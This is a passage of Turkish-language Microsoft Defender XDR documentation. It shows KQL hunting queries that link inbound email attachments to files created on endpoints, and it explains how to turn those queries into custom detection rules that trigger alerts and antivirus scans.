    | project-rename EmailTimestamp=Timestamp
    | join EmailAttachmentInfo on NetworkMessageId, RecipientObjectId
    
  6. Ardından, e-postaAttachmentInfo tablosundaki SHA256 değerini kullanarak bu karma için DeviceFileEvents'i (uç noktada gerçekleşen dosya eylemleri) bulun. Buradaki ortak alan ekin SHA256 karması olacaktır.

    Sonuçta elde edilen tablo artık uç noktadan (Uç Nokta için Microsoft Defender) cihaz adı, hangi eylemin yapıldığı (bu durumda yalnızca DosyaOluşturan olayları içerecek şekilde filtrelenmiş) ve dosyanın depolandığı yer gibi ayrıntıları içerir. İşlemle ilişkili hesap adı da eklenir.

    EmailEvents
    | where AttachmentCount > 0 and EmailDirection == "Inbound"
    | project-rename EmailTimestamp=Timestamp
    | join EmailAttachmentInfo on NetworkMessageId, RecipientObjectId
    | join DeviceFileEvents on SHA256
    | where ActionType == "FileCreated"
    

    Şimdi kullanıcının eki açtığı veya kaydettiği tüm gelen e-postaları tanımlayan bir sorgu oluşturdunuz. Ayrıca bu sorguyu belirli gönderen etki alanları, dosya boyutları, dosya türleri vb. için filtrelemek üzere daraltabilirsiniz.

  7. İşlevler, bir dosya hakkında yaygınlığı, imzalayan ve veren bilgileri gibi daha fazla TI verisi çekmenizi sağlayan özel bir birleştirme türüdür. Dosya hakkında daha fazla ayrıntı almak için FileProfile() işlevi zenginleştirmesini kullanın:

    EmailEvents
    | where AttachmentCount > 0 and EmailDirection == "Inbound"
    | project-rename EmailTimestamp=Timestamp
    | join EmailAttachmentInfo on NetworkMessageId, RecipientObjectId
    | join DeviceFileEvents on SHA256
    | where ActionType == "FileCreated"
    | distinct SHA1
    | invoke FileProfile()
    

Algılama oluşturma

Gelecekte olup olmadığı konusunda uyarı almak istediğiniz bilgileri tanımlayan bir sorgu oluşturduktan sonra, sorgudan özel bir algılama oluşturabilirsiniz.

Özel algılamalar, ayarladığınız sıklığa göre sorguyu çalıştırır ve sorguların sonuçları, seçtiğiniz etkilenen varlıklara göre güvenlik uyarıları oluşturur. Bu uyarılar olaylarla ilişkilendirilecek ve ürünlerden biri tarafından oluşturulan diğer güvenlik uyarıları olarak önceliklendirilebilir.

  1. Sorgu sayfasında, Go tehdit avcılığı yönergelerinin 7. adımına eklenen 7. ve 8. satırları kaldırın ve Algılama kuralı oluştur'a tıklayın.

    Microsoft Defender portalındaki Gelişmiş Tehdit Avcılığı sayfasının Sorgu düzenleme bölümünün ekran görüntüsü.

    Not

    Algılama kuralı oluştur'a tıklarsanız ve sorgunuzda söz dizimi hataları varsa, algılama kuralınız kaydedilmez. Hata olmadığından emin olmak için sorgunuzu bir kez daha denetleyin.

  2. Güvenlik ekibinin uyarıyı, neden oluşturulduğunu ve hangi eylemleri gerçekleştirmesini beklediğinizi anlamasını sağlayacak bilgilerle gerekli alanları doldurun.

    Microsoft Defender portalındaki Uyarı ayrıntıları sayfasının ekran görüntüsü.

    Bir sonraki kullanıcıya bu algılama kuralı uyarısı hakkında bilinçli bir karar vermeye yardımcı olmak için alanları net bir şekilde doldurduğunuzdan emin olun

  3. Bu uyarıda hangi varlıkların etkilendiğini seçin. Bu durumda Cihaz ve Posta Kutusu'ni seçin.

    Microsoft Defender portalındaki Etkilenen varlıklar ayrıntıları sayfasının ekran görüntüsü.

  4. Uyarı tetiklendiğinde gerçekleştirilecek eylemleri belirleyin. Bu durumda, başka eylemler gerçekleştirilebilse de bir virüsten koruma taraması çalıştırın.

    Microsoft Defender portalındaki Eylemler sayfasının ekran görüntüsü.

  5. Uyarı kuralının kapsamını seçin. Bu sorgu cihazları içerdiğinden, cihaz grupları Uç Nokta için Microsoft Defender bağlamını dikkate alarak bu özel algılamayla ilgilidir. Etkilenen varlıklar olarak cihaz içermeyen bir özel algılama oluştururken kapsam uygulanmaz.

    Microsoft Defender portalındaki Kapsam sayfasının ekran görüntüsü.

    Bu pilot için, bu kuralı üretim ortamınızdaki test cihazlarının bir alt kümesiyle sınırlamak isteyebilirsiniz.

  6. Oluştur’u seçin. Ardından gezinti panelinden Özel algılama kuralları'nı seçin.

    Microsoft Defender portalında Özel algılama kuralları kuralları seçeneğinin ekran görüntüsü.

    Microsoft Defender portalında algılama kurallarını ve yürütme ayrıntılarını görüntüleyen sayfanın ekran görüntüsü.

    Bu sayfadan, ayrıntılar sayfasını açacak algılama kuralını seçebilirsiniz.

    Microsoft Defender portalında tetiklenen uyarıların ayrıntılarını gösteren sayfanın ekran görüntüsü.

Gelişmiş avcılık konusunda uzman eğitimi

Saldırganı izlemek , yeni güvenlik analistleri ve deneyimli tehdit avcıları için bir web yayını serisidir. Gelişmiş avcılık ile ilgili temel bilgileri kullanarak kendi gelişmiş sorgularınızı oluşturma konusunda size yol gösterir.

Başlamak için bkz. Gelişmiş avcılık konusunda uzman eğitimi alma .

Sonraki adım

Araştırma ve Microsoft Defender XDR ile yanıt verme bilgilerini SecOps işlemlerinize dahil edin.